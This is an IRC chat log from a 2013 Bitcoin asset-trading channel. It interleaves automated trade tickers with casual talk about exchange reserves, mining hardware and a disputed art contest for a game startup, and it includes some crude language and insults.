BTC [+] Jun 14 16:54:38 ;;seen kakobrekla Jun 14 16:54:39 kakobrekla was last seen in #bitcoin-assets 17 hours, 19 minutes, and 52 seconds ago: it means shit. Jun 14 16:57:37 [MPEX] [S.MPOE] 4321 @ 0.00070513 = 3.0469 BTC [+] Jun 14 16:57:52 [MPEX] [S.MPOE] 6479 @ 0.0007052 = 4.569 BTC [+] Jun 14 17:02:37 [HAVELOCK] [ASICM] 10 @ 0.0297 = 0.297 BTC [+] Jun 14 17:05:50 you rang milord? Jun 14 17:06:32 [BTCTC] [ASICMINER-PT] 1 @ 2.811001 BTC [-] Jun 14 17:06:34 [BTCTC] [ASICMINER-PT] 1 @ 2.811 BTC [-] Jun 14 17:06:36 [BTCTC] [ASICMINER-PT] 1 @ 2.8011 BTC [-] Jun 14 17:06:37 [BTCTC] [ASICMINER-PT] 1 @ 2.801001 BTC [-] Jun 14 17:06:39 [BTCTC] [ASICMINER-PT] 1 @ 2.801 BTC [-] Jun 14 17:06:39 [BTCTC] [ASICMINER-PT] 1 @ 2.771031 BTC [-] Jun 14 17:07:48 [BTCTC] [DMS.MINING] 135 @ 0.03049 = 4.1162 BTC [+] Jun 14 17:07:53 [BTCTC] [DMS.MINING] 37 @ 0.030678 = 1.1351 BTC [+] Jun 14 17:07:55 [BTCTC] [DMS.MINING] 150 @ 0.030679 = 4.6019 BTC [+] Jun 14 17:07:57 [BTCTC] [DMS.MINING] 100 @ 0.03068 = 3.068 BTC [+] Jun 14 17:07:58 [BTCTC] [DMS.MINING] 15 @ 0.0307 = 0.4605 BTC [+] Jun 14 17:08:02 [BTCTC] [DMS.MINING] 38 @ 0.030788 = 1.1699 BTC [+] Jun 14 17:08:06 [BTCTC] [DMS.MINING] 11 @ 0.0308 = 0.3388 BTC [+] Jun 14 17:08:08 [BTCTC] [DMS.MINING] 40 @ 0.0308 = 1.232 BTC [+] Jun 14 17:08:10 [BTCTC] [DMS.MINING] 150 @ 0.03099 = 4.6485 BTC [+] Jun 14 17:08:23 [BTCTC] [DMS.MINING] 324 @ 0.031 = 10.044 BTC [+] Jun 14 17:09:06 [BTCTC] [CRYPTO-TRADE] 5 @ 0.158 = 0.79 BTC [+] Jun 14 17:11:07 [BTCTC] [ASICMINER-PT] 1 @ 2.85 BTC [+] Jun 14 17:11:08 [BTCTC] [ASICMINER-PT] 1 @ 2.86 BTC [+] Jun 14 17:11:48 o there you are Jun 14 17:13:48 [HAVELOCK] [ASICM] 10 @ 0.0297 = 0.297 BTC [+] Jun 14 17:15:35 [BTCTC] [MININGCO.ETF] 1 @ 0.8 BTC [-] Jun 14 17:15:50 [BTCTC] [TAT.VIRTUALMINE] 68 @ 0.007 = 0.476 BTC [+] Jun 14 17:17:32 wow really Jun 14 17:17:57 ;;ticker Jun 14 17:17:58 BTCUSD ticker | Best bid: 101.30000, Best ask: 101.30001, Bid-ask spread: 0.00001, Last trade: 101.30001, 24 hour volume: 49351.01237195, 24 hour low: 97.10000, 24 hour high: 109.43998, 24 hour vwap: 102.52731 Jun 14 17:18:04 go to 250 already =/ Jun 14 17:18:05 is AM just going to blow up Jun 14 17:18:10 [BTCTC] [DMS.SELLING] 100 @ 0.03675 = 3.675 BTC [-] Jun 14 17:19:01 I think once it it hits 3 you'll see some selloffs tp ush it down again Jun 14 17:19:04 [HAVELOCK] [VTX] 1 @ 0.5 BTC [-] Jun 14 17:19:11 also, some panic sells for people worried about BTC/USD Jun 14 17:19:33 there are very few OTC shares for auction right now Jun 14 17:19:39 so the price is getting away Jun 14 17:19:51 I can't complain Jun 14 17:19:57 heh :) Jun 14 17:20:09 [HAVELOCK] [ASICM] 16 @ 0.0297 = 0.4752 BTC [+] Jun 14 17:20:20 what up guys Jun 14 17:20:22 http://www.ft.com/intl/cms/s/2/910858fa-d3bf-11e2-95d4-00144feab7de.html#slide0 Jun 14 17:20:28 fucking amir... Jun 14 17:20:39 at least it isn't hard to come off looking good next to him Jun 14 17:20:49 [BTCTC] [S.DICE-PT] 20 @ 0.002899 = 0.058 BTC [+] Jun 14 17:21:28 quote: "To be a Bitcoin user is to be a Bitcoin evangelist." Jun 14 17:21:37 i call bullshit Jun 14 17:21:37 hehehe Jun 14 17:21:47 to be a dollar user is to be a dollar evenagellist Jun 14 17:22:04 anyways, my quote wasn't bad, and at least there is a picture of me with alcohol Jun 14 17:22:15 to be an evangelist is to be a salesman Jun 14 17:22:31 not everyone is a salesman Jun 14 17:22:41 true Jun 14 17:22:51 not all introverts are extroverts Jun 14 17:22:53 but someone is always being sold... Jun 14 17:23:01 i do agree with that Jun 14 17:23:04 either you're selling them, or they're selling yoiu Jun 14 17:23:05 we all sell ourselves Jun 14 17:23:23 why is amir's HQ as dirty as his face? Jun 14 17:23:45 i guess that's a silly question... Jun 14 17:23:49 hops around like a sack of rabbits Jun 14 17:24:00 that's a good line Jun 14 17:24:14 this is pretty extensive write-up Jun 14 17:24:15 grats Jun 14 17:24:19 Bitcoin needs better looking people for the photos Jun 14 17:24:22 [BTCTC] [ASICMINER-PT] 1 @ 2.801 BTC [-] Jun 14 17:24:41 like the guy with the Texas shirt? Jun 14 17:25:20 "Matt Hopard, a small investor in Bitcoin" Jun 14 17:25:51 well the bitcoin HQ in London is not so good Jun 14 17:26:35 let's quanitfy bitcoin investing Jun 14 17:26:41 *quantify Jun 14 17:26:41 multi billion market cap with a couple plastic chairs and no shoes Jun 14 17:26:57 [HAVELOCK] [ASICM] 33 @ 0.0297 = 0.9801 BTC [+] Jun 14 17:27:02 how many bitcoins before i am a large investor Jun 14 17:27:09 how many do i need to hold Jun 14 17:27:19 [BTCTC] [S.DICE-PT] 3 @ 0.002899 = 0.0087 BTC [+] Jun 14 17:27:24 enough to influence the market Jun 14 17:27:40 enough to make the person you are talking to feel small Jun 14 17:27:45 "the market" being gox Jun 14 17:27:55 surely not Jun 14 17:27:59 not have to sell your shoes, to get a bitcoin loan? Jun 14 17:28:01 [BTCTC] [ASICMINER-PT] 1 @ 2.800001 BTC [-] Jun 14 17:28:03 mjr_ lmao Jun 14 17:28:07 [BTCTC] [ASICMINER-PT] 2 @ 2.8 = 5.6 BTC [-] Jun 14 17:28:18 the people i could get loans from know better than to loan bitcoins Jun 14 17:28:52 I am just saying, maybe they should have gotten a few better pics Jun 14 17:29:02 amir's is el terrible Jun 14 17:29:11 what the f is on his head Jun 14 17:29:12 the one with Rossi and Screm is good Jun 14 17:29:16 is that a bun Jun 14 17:29:25 sshrem Jun 14 17:29:29 it's a sleeping mohawk Jun 14 17:29:43 [BTCTC] [TAT.ASICMINER] 10 @ 0.02949 = 0.2949 BTC [+] Jun 14 17:29:47 yeah, the princess leigh bun on the one guys hair is not good Jun 14 17:30:32 [HAVELOCK] [ASICM] 33 @ 0.0297 = 0.9801 BTC [+] Jun 14 17:30:41 jborkl: aw thanks Jun 14 17:30:45 lol Jun 14 17:31:23 Well, at least you look pro in the photo, not like a idiot in his basement Jun 14 17:31:42 [HAVELOCK] [ASICM] 100 @ 0.0297 = 2.97 BTC [+] Jun 14 17:32:50 http://www.asig.asia/ these guys want me to send a "fund brochure (if any) for my board of directors and could would like to know about funds inner workings ( eg. ROI, risks, etc)" for ASICM on Havelock Jun 14 17:33:24 anyway, I think it went ok, up to the Amir part...what a retard Jun 14 17:33:38 "they are trying to take away the political agenda from bitcoin" Jun 14 17:33:43 it doesn't have an agenda Jun 14 17:33:48 its a currency, not a person Jun 14 17:33:52 [HAVELOCK] [ASICM] 1 @ 0.0297 BTC [+] Jun 14 17:34:25 [HAVELOCK] [ASICM] 100 @ 0.0297 = 2.97 BTC [+] Jun 14 17:34:27 I thought it's agenda was to facilitate SR? Jun 14 17:34:35 its* Jun 14 17:35:40 i thought the agenda was to destroy fractional reserve banking Jun 14 17:35:48 which doesn't have to be political at all Jun 14 17:36:13 does it really affect fractional reserve? Jun 14 17:36:27 Formerly a gold day-trader, he began buying Bitcoin two years ago and this March gave up his flat and sold his possessions to begin squatting. Jun 14 17:36:31 for every dollar that stays in bitcoin, that's a 100 that _should never_ exist in a fractional reserve bank Jun 14 17:36:38 :( Jun 14 17:36:42 but Jun 14 17:36:52 look at every bitcoin currency/stock exchange Jun 14 17:36:55 [BTCTC] [S.DICE-PT] 60 @ 0.002501 = 0.1501 BTC [-] Jun 14 17:36:56 [BTCTC] [ASICMINER-PT] 1 @ 2.888 BTC [+] Jun 14 17:36:58 [BTCTC] [ASICMINER-PT] 1 @ 2.889 BTC [+] Jun 14 17:37:02 they could all fractionally bank Jun 14 17:37:07 and just not say so Jun 14 17:37:17 oh don't hurt my brain Jun 14 17:37:25 website who scam are a awhole nother topic Jun 14 17:37:58 it's a factor with bitcoin, it being as anonymous as it is public Jun 14 17:38:02 these sites which takes our coins and "make more" can't operate directly on the blockchain Jun 14 17:38:05 i wish they could Jun 14 17:38:11 [BTCTC] [S.DICE-PT] 27 @ 0.002501 = 0.0675 BTC [-] Jun 14 17:38:19 like every trade existed on the blockchain Jun 14 17:38:19 you can fractionally bank toilet paper, just hope not too many people have to take a shit at the same time Jun 14 17:38:31 indeed Jun 14 17:38:32 [BTCTC] [DMS.PURCHASE] 200 @ 0.066256 = 13.2512 BTC [+] Jun 14 17:38:33 seperate trade-chain required Jun 14 17:38:47 BTCT.co keeps like a 50btc hot wallet Jun 14 17:39:00 [BTCTC] [DMS.PURCHASE] 50 @ 0.066256 = 3.3128 BTC [+] Jun 14 17:39:05 i have to wait for manual withdrawals multiple times a day Jun 14 17:39:18 [BTCTC] [TAT.ASICMINER] 5 @ 0.02949 = 0.1475 BTC [+] Jun 14 17:39:22 he could be very fractional in practice Jun 14 17:39:31 so you have no idea where there liquidity is coming from Jun 14 17:40:00 i've always hated these website because i do not know what they are doing on the backend with my coins Jun 14 17:40:14 i'd like to follow my money on a ledger Jun 14 17:40:19 after it enters the box Jun 14 17:41:21 i bet your deposits go into a cold storage and he just credits your account with "btc points" you can withdraw, only a portion at a time Jun 14 17:41:33 btct seems pretty secure to me Jun 14 17:41:47 of course it seems secure Jun 14 17:41:57 but it doesnt prove anything Jun 14 17:42:19 i can think of a number of ways his system could be abused by this practice Jun 14 17:42:31 not saying he's abusing it Jun 14 17:42:39 just that we can't know Jun 14 17:43:09 maybe I'll start the BSU, Bitcoin Stockholder Union Jun 14 17:43:15 TAT, you should know how easy it is to fractionally reserve something Jun 14 17:43:18 and we'll stage audits of each exchange Jun 14 17:43:22 not that you are Jun 14 17:43:30 where everyone withdraws all their coin on one day Jun 14 17:43:57 [BTCTC] [S.DICE-PT] 13 @ 0.002501 = 0.0325 BTC [-] Jun 14 17:43:58 jborkl, for the most part, my assets are fully auditable on the fly actually Jun 14 17:44:31 I am saying, -I do not beleive you are, but you have a idea how easy it could be Jun 14 17:44:45 my AM wallet address is public, i use that address for my BF account, and my BTCT,co portfolio is public Jun 14 17:45:05 you could set up a bot to audit me autmatically Jun 14 17:45:06 well, that works very well actually Jun 14 17:45:13 good job Jun 14 17:45:54 i keep a spreadsheet for myself to make sure i dont sell naked Jun 14 17:45:56 etc Jun 14 17:46:23 [BTCTC] [TAT.ASICMINER] 10 @ 0.02831 = 0.2831 BTC [-] Jun 14 17:46:27 [BTCTC] [TAT.ASICMINER] 10 @ 0.0283 = 0.283 BTC [-] Jun 14 17:46:29 [BTCTC] [TAT.ASICMINER] 20 @ 0.0282 = 0.564 BTC [-] Jun 14 17:46:39 you know what scares me? Jun 14 17:46:45 bronies know how to animate things. Jun 14 17:46:53 [BTCTC] [ASICMINER-PT] 1 @ 2.889 BTC [+] Jun 14 17:47:25 it wont matter if I petition hasbro to cancel the series for the good of the world Jun 14 17:47:34 they can just make their own episodes Jun 14 17:47:50 http://www.youtube.com/watch?v=26BQ0HNtDmI Jun 14 17:47:52 case in point Jun 14 17:48:01 but Jun 14 17:48:04 http://www.wired.com/underwire/2011/06/bronies-my-little-ponys/ Jun 14 17:48:12 if it werent for you i'd have never even known any of this Jun 14 17:48:18 you are making it worse! Jun 14 17:48:18 same here Jun 14 17:48:25 ThickAsThieves: might as well watch what I linked to Jun 14 17:48:29 wasnt expecting the ending Jun 14 17:49:37 men like this? Jun 14 17:50:09 Who the fuck watches My little pony Jun 14 17:50:13 you need a futures market, settled monthly, so you only have to move actual coins once a month Jun 14 17:51:15 ThickAsThieves: I dunno, Im a transformers kind of guy Jun 14 17:51:39 [BTCTC] [BITVPS] 3 @ 0.000677 = 0.002 BTC [-] Jun 14 17:51:54 shit blows up, talking robots, manly sacrifices, expensive toys that actually do shit Jun 14 17:52:25 [HAVELOCK] [ASICM] 1 @ 0.0297 BTC [+] Jun 14 17:52:31 [BTCTC] [ASICMINER-PT] 1 @ 2.889999 BTC [+] Jun 14 17:52:44 [BTCTC] [ASICMINER-PT] 1 @ 2.89 BTC [+] Jun 14 17:53:48 [HAVELOCK] [ASICM] 3 @ 0.0297 = 0.0891 BTC [+] Jun 14 17:54:00 i like what TAT suggested Jun 14 17:54:06 I'm down for a staged run Jun 14 17:54:14 see how they handle it Jun 14 17:55:11 unfortunately it would require a majority of users to actually coordinate Jun 14 17:55:29 most of them likely being American... Jun 14 18:00:21 [BTCTC] [DMS.MINING] 37 @ 0.030998 = 1.1469 BTC [-] Jun 14 18:03:13 jcpham my memory fails me, what was the three card setup really popular back in 2011/12 ? Jun 14 18:03:16 7570 or what ? Jun 14 18:05:13 [BTCTC] [DMS.SELLING] 50 @ 0.0365 = 1.825 BTC [-] Jun 14 18:05:15 5970s were the juice I think Jun 14 18:05:20 maybe not the cheapest tho Jun 14 18:05:42 [BTCTC] [TAT.ASICMINER] 23 @ 0.02935 = 0.6751 BTC [+] Jun 14 18:06:18 [BTCTC] [DMS.PURCHASE] 50 @ 0.066256 = 3.3128 BTC [+] Jun 14 18:07:12 tghere was one board that worked in 3s Jun 14 18:07:16 iirc 5970s worked in 4s Jun 14 18:08:08 those future gen 9990s Jun 14 18:09:44 http://trilema.com/2013/retained-cto-first-public-commission-other-statements/ << Jun 14 18:12:13 [BTCTC] [TAT.ASICMINER] 2 @ 0.0292 = 0.0584 BTC [-] Jun 14 18:18:42 mircea_popescu: my cookies expired :( Jun 14 18:18:48 so reset it. Jun 14 18:18:50 DO I HAVE TO PAY YOU MORE MONIES Jun 14 18:19:00 just set it again liek you did the prev time Jun 14 18:19:09 I don't have the original codes Jun 14 18:19:13 so we'll have to do this dance again Jun 14 18:19:16 address? Jun 14 18:19:32 [BTCTC] [RSM] 1 @ 0.01449 BTC [+] Jun 14 18:20:52 [BTCTC] [TAT.ASICMINER] 5 @ 0.0292 = 0.146 BTC [-] Jun 14 18:20:57 [MPEX] [S.MPOE] 7692 @ 0.00070424 = 5.417 BTC [-] Jun 14 18:21:02 [MPEX] [S.MPOE] 2039 @ 0.00070138 = 1.4301 BTC [-] Jun 14 18:21:12 [BTCTC] [ASICMINER-PT] 1 @ 2.830002 BTC [-] Jun 14 18:24:01 [BTCTC] [DMS.MINING] 63 @ 0.030998 = 1.9529 BTC [-] Jun 14 18:24:03 [BTCTC] [DMS.MINING] 27 @ 0.030998 = 0.8369 BTC [-] Jun 14 18:24:20 [BTCTC] [DMS.MINING] 1 @ 0.030998 BTC [-] Jun 14 18:26:10 [BTCTC] [DMS.PURCHASE] 50 @ 0.066256 = 3.3128 BTC [+] Jun 14 18:26:51 [HAVELOCK] [ASICM] 2 @ 0.0296999 = 0.0594 BTC [-] Jun 14 18:28:03 [BTCTC] [BTC-BOND] 3 @ 0.009993 = 0.03 BTC [-] Jun 14 18:28:04 mp, were you unable to find a suitable artist from our previous conversation? Jun 14 18:28:04 [BTCTC] [BTC-BOND] 4 @ 0.009994 = 0.04 BTC [+] Jun 14 18:28:06 [BTCTC] [BTC-BOND] 1 @ 0.009994 BTC [+] Jun 14 18:28:08 [BTCTC] [BTC-BOND] 2 @ 0.009995 = 0.02 BTC [+] Jun 14 18:28:18 [BTCTC] [TAT.ASICMINER] 1 @ 0.0292 BTC [-] Jun 14 18:28:19 assuming that was a precursor to S.MG Jun 14 18:29:04 [BTCTC] [TAT.VIRTUALMINE] 1 @ 0.00685 BTC [-] Jun 14 18:29:10 [BTCTC] [TAT.VIRTUALMINE] 1 @ 0.00685 BTC [-] Jun 14 18:30:16 [BTCTC] [TAT.ASICMINER] 6 @ 0.02928 = 0.1757 BTC [+] Jun 14 18:30:55 a willingness to be open and give people chances should NEVER be construed as my inability. Jun 14 18:30:59 i expect a pedestal for this. Jun 14 18:31:03 haha Jun 14 18:31:12 it was just an honest question Jun 14 18:31:12 [BTCTC] [TAT.VIRTUALMINE] 4 @ 0.00685 = 0.0274 BTC [-] Jun 14 18:31:13 [BTCTC] [TAT.VIRTUALMINE] 81 @ 0.0068 = 0.5508 BTC [-] Jun 14 18:31:20 and i gave a honest answer. Jun 14 18:31:34 maybe i shouldnt have said 'unable' Jun 14 18:31:58 [BTCTC] [TAT.VIRTUALMINE] 30 @ 0.007 = 0.21 BTC [+] Jun 14 18:31:58 sersiously, i think the best way to go is open and i'm trying to implement that Jun 14 18:32:13 can you also clarify the payment for the artist Jun 14 18:32:17 i see your explanation Jun 14 18:32:17 bitcoin generally needs a lot of it and i think tio a large degree the problem is people never saw an open model. Jun 14 18:32:26 this for the record includes the -dev neckbeards. Jun 14 18:32:31 but it reads like reptilia speak to me Jun 14 18:32:38 so ask. Jun 14 18:32:43 [BTCTC] [TAT.VIRTUALMINE] 4 @ 0.0068 = 0.0272 BTC [-] Jun 14 18:32:44 [BTCTC] [TAT.VIRTUALMINE] 4 @ 0.007 = 0.028 BTC [+] Jun 14 18:32:52 what does the chosen artist get in BTC? Jun 14 18:33:08 [HAVELOCK] [ASICM] 33 @ 0.0296999 = 0.9801 BTC [-] Jun 14 18:33:12 plz use commas not points if appropriate Jun 14 18:33:16 you mean the guy we use the spashscreen of ? 1.337 Jun 14 18:33:25 one whole bitcoin adn a little over a third of another Jun 14 18:33:29 hrm Jun 14 18:33:46 then i'll be the first annoying guy to tell you it's too low Jun 14 18:33:47 [BTCTC] [TAT.VIRTUALMINE] 1 @ 0.006725 BTC [-] Jun 14 18:33:55 [BTCTC] [TAT.VIRTUALMINE] 1 @ 0.006721 BTC [-] Jun 14 18:34:01 not because i dont think people will submit Jun 14 18:34:02 or Jun 14 18:34:09 that its not an opportunity Jun 14 18:34:20 hey, i don't care. people need to understand that you get nothing for nothing. Jun 14 18:34:28 but simply because it's worth more than that for someones art and experience Jun 14 18:34:30 they want to be involved, they sacrifice a little of their time and make a drawing. Jun 14 18:34:35 they can't, they won't, there's no deal. Jun 14 18:34:50 its not the best method for quality Jun 14 18:34:52 once they do that we can talk. before, they have nothing to stand on. Jun 14 18:35:24 alternatively someone can come to me and show me he's super-trusted for his artistry in the wot. Jun 14 18:35:28 somehow i doubt that'd happen tho. Jun 14 18:35:39 5970's mircea_popescu Jun 14 18:35:42 i was afk Jun 14 18:35:42 why didnt you use this method to choose the CTO? Jun 14 18:35:54 art is fungible. code management is not. Jun 14 18:35:56 5970'sa re dual GPU on one board Jun 14 18:36:07 2x 5950's one card Jun 14 18:36:09 jcpham i meand the tree thing Jun 14 18:36:17 there was something that worked in threes Jun 14 18:36:17 all the x970's are that setup Jun 14 18:36:38 all of my rigs are three card setups... so unsure Jun 14 18:36:46 hm Jun 14 18:36:54 you can mix and match too Jun 14 18:37:08 but the 5970's were the tits in 2011 Jun 14 18:37:09 you underestimate the power of commercial art Jun 14 18:37:23 how you mean ? Jun 14 18:37:32 [BTCTC] [TAT.ASICMINER] 12 @ 0.02928 = 0.3514 BTC [+] Jun 14 18:37:43 well its not a new thing Jun 14 18:37:53 you do not value aesthetic it seems Jun 14 18:37:59 nor marketing values Jun 14 18:38:27 ... Jun 14 18:38:33 based on the naked chicks, I'm saying mircea_popescu values aethetics Jun 14 18:38:40 looky. let's segment this to understand each other better. Jun 14 18:38:45 ok Jun 14 18:38:53 [BTCTC] [TAT.ASICMINER] 54 @ 0.02929 = 1.5817 BTC [+] Jun 14 18:39:17 types of people who think they produce art : A. people with a history, who get paid well already. B. people with talent but no history. C. idiots who produce garbage. Jun 14 18:39:54 i'm with you there Jun 14 18:40:06 now, A is likely to be already overpaid, as per Peter's principle. my basic management rulebook says "never compete in crowded markets". so, i am not VERY interested in A. Jun 14 18:40:12 mircea_popescu: problem Jun 14 18:40:20 the idiots who produce garbage get paid the most money Jun 14 18:40:25 i don't need their name, and i don't need their farts. the only way we can work together is if they're not ossified old farts. Jun 14 18:40:28 [BTCTC] [DMS.MINING] 22 @ 0.030998 = 0.682 BTC [-] Jun 14 18:40:33 [BTCTC] [DMS.MINING] 50 @ 0.030998 = 1.5499 BTC [-] Jun 14 18:40:35 [BTCTC] [DMS.MINING] 150 @ 0.030999 = 4.6499 BTC [+] Jun 14 18:40:41 [BTCTC] [DMS.MINING] 184 @ 0.031 = 5.704 BTC [+] Jun 14 18:40:42 B has a serious problem in that it wants to be A, in many cases it should be A, however... it's not A. Jun 14 18:40:56 these are the people i wqant. i can help them, they can help me, we can go far together. Jun 14 18:41:11 now, your contention is that B will be too pretentious to recognise a helping hand when one's extended, and only C will contribute Jun 14 18:41:13 that's fine. Jun 14 18:41:25 i will at least be able to say (as so many times before), hey community ? you had your opportunity. Jun 14 18:41:26 yes, but while A would put you in heavy competition Jun 14 18:41:35 there is still competition for B as well Jun 14 18:41:40 ;;ticker Jun 14 18:41:40 BTCUSD ticker | Best bid: 100.00000, Best ask: 100.05998, Bid-ask spread: 0.05998, Last trade: 100.05998, 24 hour volume: 51014.50251726, 24 hour low: 97.10000, 24 hour high: 109.40000, 24 hour vwap: 102.40561 Jun 14 18:41:41 get the free account when it's free, that way you won't have to bitch about pauying 30 btc. Jun 14 18:41:49 [HAVELOCK] [ASICM] 4 @ 0.0293 = 0.1172 BTC [-] Jun 14 18:41:51 and what you offer, noth in BTC and in opportunity, is quite uncertain Jun 14 18:41:56 ;;calc 50 * 100.00000 Jun 14 18:41:56 5000 Jun 14 18:42:00 both* Jun 14 18:42:05 bad gribble, more .00000 Jun 14 18:42:16 [HAVELOCK] [ASICM] 10 @ 0.0292 = 0.292 BTC [-] Jun 14 18:42:16 ThickAsThieves how's it uncertain ? if the game is a success they'll be the new famous guy. Jun 14 18:42:21 if Jun 14 18:42:27 well listen, the cto took ssws Jun 14 18:42:34 if the stock never gets past 1.2 she gets zilch Jun 14 18:42:39 i took ssws too for that matter. Jun 14 18:42:44 this is what it means to be in a start-up. Jun 14 18:42:54 do you know how many if opportunities a good but not successful artist gets? Jun 14 18:42:59 the only reason i'm even contemplating the Bs is this. otherwise i'd just hire A and piss over everyone Jun 14 18:43:02 not like i can't do so. Jun 14 18:43:04 most turn out to be losses Jun 14 18:43:16 his job to pick and choose. i think the arguments here are well made. Jun 14 18:43:26 [BTCTC] [TAT.ASICMINER] 22 @ 0.02929 = 0.6444 BTC [+] Jun 14 18:43:32 https://bitcointalk.org/index.php?topic=234170.0 Jun 14 18:43:40 there is indeed a crowded market in B Jun 14 18:43:46 it's on your side Jun 14 18:43:47 no argument. Jun 14 18:43:54 it's crowded both ways. Jun 14 18:43:58 people wanting free art for opportunity Jun 14 18:44:01 full of people trying to get something done for free Jun 14 18:44:14 just, in this case, it's quite clear i can't take it and run. da fuck am i gonna do with a splashscreen Jun 14 18:44:40 the decenly talented and undiscovered mostly know better than to enter evert free contest and cross their fingers Jun 14 18:44:50 this is a theory. Jun 14 18:45:11 as far as i can see, it's trivial do distinguish C from B. seeing how teh B need me to become A... no brainer. Jun 14 18:45:20 but i guess this may take some thinking to sink in Jun 14 18:45:29 they have whole organizations educating them to know better Jun 14 18:45:45 http://www.no-spec.com/ Jun 14 18:45:48 yeah. organisations sponsored by an alliance of the A, trying to prevent the B from A-ing Jun 14 18:45:49 etc Jun 14 18:45:55 and the large corps, trying to prevent S.MG from killing them Jun 14 18:46:06 this is all fine and good, but an artist needs to turn off the tv once in a while. Jun 14 18:46:12 mostly spawned from hating crowdsourcing Jun 14 18:46:18 and people asking for free art all the time Jun 14 18:46:21 no, that's what it masquerades as Jun 14 18:46:24 but in fact it's a BSA Jun 14 18:46:58 i do agree that a good artist will be inspired to speculate on the right project Jun 14 18:47:12 you simply present nothing to show it might be one Jun 14 18:47:18 srsly ?! Jun 14 18:47:36 how about... it's funded. Jun 14 18:48:22 https://bitcointalk.org/index.php?topic=234147.msg2472189#msg2472189 lol this guy Jun 14 18:49:00 [BTCTC] [TAT.ASICMINER] 9 @ 0.0293 = 0.2637 BTC [+] Jun 14 18:52:07 [BTCTC] [TAT.ASICMINER] 12 @ 0.02831 = 0.3397 BTC [-] Jun 14 18:52:19 [BTCTC] [TAT.ASICMINER] 12 @ 0.02831 = 0.3397 BTC [-] Jun 14 18:52:21 [BTCTC] [ASICMINER-PT] 2 @ 2.8978 = 5.7956 BTC [+] Jun 14 18:52:22 [BTCTC] [TAT.ASICMINER] 31 @ 0.02831 = 0.8776 BTC [-] Jun 14 18:52:23 [BTCTC] [TAT.ASICMINER] 15 @ 0.0283 = 0.4245 BTC [-] Jun 14 18:52:41 [BTCTC] [DMS.SELLING] 12 @ 0.036001 = 0.432 BTC [-] Jun 14 18:53:06 [BTCTC] [ASICMINER-PT] 1 @ 2.8978 BTC [+] Jun 14 18:53:46 [BTCTC] [TAT.VIRTUALMINE] 20 @ 0.007 = 0.14 BTC [+] Jun 14 18:54:11 yes Jun 14 18:54:12 just because YOU are sure of something, Jun 14 18:54:12 does not mean you have communicated its value Jun 14 18:54:12 ive had a number of guys with money and the next big idea come thru my doors wanting freebies and cheapies Jun 14 18:54:12 some had my ear Jun 14 18:55:11 [HAVELOCK] [ASICM] 1 @ 0.0290001 BTC [-] Jun 14 18:55:12 [HAVELOCK] [ASICM] 49 @ 0.0288111 = 1.4117 BTC [-] Jun 14 18:56:15 [BTCTC] [ASICMINER-PT] 1 @ 2.8978 BTC [+] Jun 14 18:56:34 hey, i understand what you're saying. Jun 14 18:56:46 [HAVELOCK] [ASICM] 8 @ 0.0288111 = 0.2305 BTC [-] Jun 14 18:56:56 in the end the discussion always is should i stick to the dayjob or should i take the plunge. Jun 14 18:57:08 some were shown the door Jun 14 18:57:08 few were obliged Jun 14 18:57:09 communicating and convincing of their idea Jun 14 18:57:09 was crucial Jun 14 18:57:17 i can see why artists get queasy when they're put in the same position developers have had (and thrived in!) for decades now Jun 14 18:57:18 being funded is only good enough, if you are passing on real pay Jun 14 18:57:18 being funded and wanting free, kinda nullifies things Jun 14 18:57:22 but in the end... it's what it is. Jun 14 18:57:25 now if you had some awesome concept Jun 14 18:57:25 and something that could motivat epeople to rally behind you Jun 14 18:57:27 you;d get free easily Jun 14 18:57:27 hell you paid 10btc when they worth more for people to photochop a rape scene and look at the crap you got Jun 14 18:57:41 ThickAsThieves that is EXACTLY why i don;'t believe paying helps./ Jun 14 18:58:00 why not offer stock options then Jun 14 18:58:08 people like to run their mouth. lazy butts who know already they won't do it are finding this excuse. if this wasn't here it'd be another. Jun 14 18:58:19 ThickAsThieves i don't offer stock options to people just walking in the door. Jun 14 18:58:36 if their submission impresses the ssw is certainly on the table. Jun 14 18:59:14 [BTCTC] [TAT.ASICMINER] 24 @ 0.02929 = 0.703 BTC [+] Jun 14 19:00:00 isnt that already the stipulation Jun 14 19:00:06 hm ? Jun 14 19:00:07 that it impresses? Jun 14 19:00:25 well maybe this isn't obvious, so let's go through the process. Jun 14 19:00:58 artist sees the article. instead of going "o, i am an enchanted unicorn, i should be sent cookies!" or "oh, i saw on tv contests are badmkay" he goes cool, let's see what i can do. Jun 14 19:01:00 [BTCTC] [TAT.ASICMINER] 21 @ 0.02929 = 0.6151 BTC [+] Jun 14 19:01:09 so he sits down and makes a 2k px thing and posts it. Jun 14 19:01:12 So the art contest is more of a job application for artists to get work from S.MG? Jun 14 19:01:32 now, avenue A : i'm an asshole and steal his 2k px poster. I print it and hang it in my bedroom. Jun 14 19:01:58 avenue B : it's good enough, he gets the task of making fifty game sprites as so and so, and how much would he like to be paid for this ? Jun 14 19:02:03 peterl exactly. Jun 14 19:02:30 but you say no such thing in your post, right? Jun 14 19:02:44 well i guess i'm an idiot then ? SEEMS OBVIOUS TO ME!!! Jun 14 19:03:01 [11:47] just because YOU are sure of something, Jun 14 19:03:01 [11:48] does not mean you have communicated its value Jun 14 19:03:02 [BTCTC] [DMS.MINING] 1 @ 0.03149 BTC [+] Jun 14 19:03:09 fu you're just like imsaguy Jun 14 19:03:25 does he also expose that you are not always perfect? Jun 14 19:03:41 buncha kids coming in here with their obvious things i've overlooked and disturbing Jun 14 19:03:46 I CALL THE POLICE I TELL YOU Jun 14 19:03:48 [BTCTC] [ASICMINER-PT] 4 @ 2.8978 = 11.5912 BTC [+] Jun 14 19:03:59 [BTCTC] [DMS.MINING] 2 @ 0.03149 = 0.063 BTC [+] Jun 14 19:04:09 i read the post, wasnt sure what you were offering, so i asked Jun 14 19:04:11 [BTCTC] [TAT.VIRTUALMINE] 10 @ 0.007 = 0.07 BTC [+] Jun 14 19:04:18 anyway. here's what i'm gonna do : i'ma steal this dialogue and post it as a comment Jun 14 19:04:27 [BTCTC] [TAT.ASICMINER] 34 @ 0.0293 = 0.9962 BTC [+] Jun 14 19:04:29 and in exchange you can make any further comments any time you want :D Jun 14 19:04:34 if you accept the conversation, you could improve your post and potentially improve the quality of your submission Jun 14 19:04:37 everyone wins Jun 14 19:04:47 the post says "anybody who impresses may get more work later", seems pretty clear what people would get for entering Jun 14 19:05:08 peterl nah he has a point, twasn't nearly insisted upon enough Jun 14 19:05:16 [BTCTC] [TAT.VIRTUALMINE] 9 @ 0.007 = 0.063 BTC [+] Jun 14 19:05:31 Most artists suck though. Jun 14 19:05:37 you also might consider separating the post entirely from the CTO stuff Jun 14 19:05:38 I guess you could give an idea of how 